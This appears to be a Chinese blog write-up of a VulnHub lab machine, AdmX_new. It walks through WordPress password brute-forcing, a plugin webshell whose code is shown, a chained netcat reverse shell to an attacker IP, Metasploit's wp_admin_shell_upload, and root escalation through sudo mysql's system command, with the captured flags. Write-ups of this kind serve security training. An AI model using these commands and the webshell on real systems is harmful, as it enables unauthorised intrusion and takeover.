vulnhub_AdmX_new

2023-12-30 08:26:40

信息搜集

nmap扫描出来只开放了80端口

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))

目录扫描

feroxbuster --url http://192.168.56.107

发现是个wordpress站点，但是入口处页面很简陋，发现他页面中写死的请求的ip是另一个

<link rel='stylesheet' id='dashicons-css'  href='http://192.168.159.145/wordpress/wp-includes/css/dashicons.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='buttons-css'  href='http://192.168.159.145/wordpress/wp-includes/css/buttons.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='forms-css'  href='http://192.168.159.145/wordpress/wp-admin/css/forms.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='l10n-css'  href='http://192.168.159.145/wordpress/wp-admin/css/l10n.min.css?ver=5.7.1' media='all' />
<link rel='stylesheet' id='login-css'  href='http://192.168.159.145/wordpress/wp-admin/css/login.min.css?ver=5.7.1' media='all' />

由于当前靶机ip是192.168.56.107，我们无法通过靶机直接转发，可以用burp更改转发

使用BURP/Proxy/Options

Match and Replace功能

设置完毕，页面正常，尝试爆破后台密码

wpscan --url http://192.168.56.107/wordpress -U admin -P /rockyou.txt

admin/adam14

getshell

使用Plugins模块，自己上传一个写好的带有webshell的plugins

<?php
/*
Plugin Name: shell
Plugin URI:  https://developer.wordpress.org/plugins/the-basics/
Description: Basic WordPress Plugin Header Comment
Version:     20160911
Author:      WordPress.org
Author URI:  https://developer.wordpress.org/
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
Text Domain: wporg
Domain Path: /languages
*/

if(isset($_GET['cmd']))
{
    system($_GET['cmd']);
}
?>

打包成shell.php，上传

http://192.168.56.107/wordpress/wp-content/plugins/shell/shell.php?cmd=ls

串联反弹shell

nc 192.168.56.103 3333 | /bin/bash | nc 192.168.56.103 4444

换个方法,msf

msfconsole

#查找exp
search wp_admin shell

#使用exp
use exploit/unix/webapp/wp_admin_shell_upload

#填写所需要的目标主机信息
show options

#
run

但是只有www-data权限

su wpadmin 用adam14可以登录,然后拿到第一个flag

cat local.txt 153495edec1b606c24947b1335998bd9

提权

登录mysql

sudo /usr/bin/mysql -u root -D wordpress -p

调用system函数，发现有root权限

MariaDB [wordpress]> system id
system id
uid=0(root) gid=0(root) groups=0(root)

MariaDB [wordpress]> system ls /root
system ls /root
proof.txt  snap
MariaDB [wordpress]> system cat /root/proof.txt
system cat /root/proof.txt
7efd721c8bfff2937c66235f2d0dbac1

拿到第二个flag

注：这里的mysql密码在wordpress的配置文件里找到

/var/www/html/wordpress/wp-config.php

码农公寓

信息搜集

getshell

提权

相关文章